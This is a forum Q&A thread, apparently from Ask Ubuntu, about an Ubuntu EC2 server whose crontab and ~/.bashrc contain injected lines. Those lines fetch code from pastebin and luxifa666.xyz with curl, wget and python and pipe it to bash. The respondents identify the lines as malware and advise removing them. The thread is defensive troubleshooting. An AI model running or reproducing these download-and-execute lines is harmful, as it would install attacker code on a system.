# No crontab for ubuntu

Tags: 18.04, server, cron

When i login to the terminal of ubuntu server 18.04 (EC2), i get like this

```
Usage:
 kill [options] <pid> [...]

Options:
 <pid> [...]            send signal to every <pid> listed
 -<signal>, -s, --signal <signal>
                        specify the <signal> to be sent
 -l, --list=[<signal>]  list all signal names, or convert one to a name
 -L, --table            list all signal names in a nice table

 -h, --help     display this help and exit
 -V, --version  output version information and exit

For more details see kill(1).

Usage:
 kill [options] <pid> [...]

Options:
 <pid> [...]            send signal to every <pid> listed
 -<signal>, -s, --signal <signal>
                        specify the <signal> to be sent
 -l, --list=[<signal>]  list all signal names, or convert one to a name
 -L, --table            list all signal names in a nice table

 -h, --help     display this help and exit
 -V, --version  output version information and exit

For more details see kill(1).

Usage:
 kill [options] <pid> [...]

Options:
 <pid> [...]            send signal to every <pid> listed
 -<signal>, -s, --signal <signal>
                        specify the <signal> to be sent
 -l, --list=[<signal>]  list all signal names, or convert one to a name
 -L, --table            list all signal names in a nice table

 -h, --help     display this help and exit
 -V, --version  output version information and exit

For more details see kill(1).

Usage:
 kill [options] <pid> [...]

Options:
 <pid> [...]            send signal to every <pid> listed
 -<signal>, -s, --signal <signal>
                        specify the <signal> to be sent
 -l, --list=[<signal>]  list all signal names, or convert one to a name
 -L, --table            list all signal names in a nice table

 -h, --help     display this help and exit
 -V, --version  output version information and exit

For more details see kill(1).
no crontab for ubuntu
no crontab for ubuntu
```

By looking at few forums i thought that the crontab file for user "ubuntu" was empty but when i used 
**crontab -l ** , I got this

```
*/1 * * * * (curl -fsSL https://pastebin.com/raw/BLPNmuQw||wget -q -O- https://pastebin.com/raw/BLPNmuQw||curl -fsSL https://pastebin.com/raw/t92Qw9LP||wget -q -O - https://pastebin.com/raw/t92Qw9LP||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/BLPNmuQw").read()'||curl -fsSLk luxifa666.xyz:9080/host-manager/java.txt -m 90||wget -q -O - luxifa666.xyz:9080/host-manager/java.txt --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1
```

Based on my research it should work. and I haven't made any modifications to this file. What am i missing here  ?

Comment: What “should work” actually? If the help text for `kill` appears right after login, then the files like `.bashrc` should be suspected rather than `crontab`. However, your `crontab -l` output looks pretty suspicious to me, too. It’s very, very obfuscated – that is what malware usually does.

Comment: Would it be good to clear the file then ?

Comment: @Melebius there was  a suspicious entry in my ~/.bashrc 

"(curl -fsSLk luxifa666.xyz:9080/host-manager/java.txt -m 90||wget -q -O - luxifa666.xyz:9080/host-manager/java.txt --no-check-certificate -t 2 -T 60||curl -fsSL https://pastebin.com/raw/BLPNmuQw||wget -q -O- https://pastebin.com/raw/BLPNmuQw)|bash
##loaded_javaUpdates_rc
"

Answer (score 0):

The code starting with `(curl -fsSL` followed by cryptic URLs etc. you have in your `~/.bashrc` file and crontab looks like malware. It downloads some code from the internet (using `curl` and `wget`) and tries to execute it using Python and Bash.

If you haven’t added these lines intentionally, remove them (backup the content first and store it as non-executable) and ensure you are the only one who can access your virtual machine – changing your password is the absolute minimum. Inspect running processes (isn’t someone trying to mine cryptocurrency there, for example?) and system logs.

Comment: Thankyou! sure will do!